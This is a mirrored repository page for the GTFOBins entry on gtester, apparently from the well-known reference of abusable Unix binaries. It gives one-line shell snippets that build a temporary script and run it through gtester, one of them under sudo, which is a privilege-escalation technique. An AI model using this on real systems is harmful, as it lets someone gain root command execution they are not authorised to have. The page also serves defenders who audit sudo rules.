This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-21 07:11:33 +01:00
Code
Issues
ee1093fc7b
GTFOBins.github.io
/
_gtfobins
/
gtester.md
bcoles
ee1093fc7b
Create gtester.md
2020-03-17 20:32:25 +01:00
331 B
Raw
Blame
History
functions
command
sudo
code
TF=$(mktemp) echo '#!/bin/sh' > $TF echo '/usr/bin/id' >> $TF chmod +x $TF gtester -q $TF
code
TF=$(mktemp) echo '#!/bin/sh' > $TF echo '/usr/bin/id' >> $TF chmod +x $TF sudo gtester -q $TF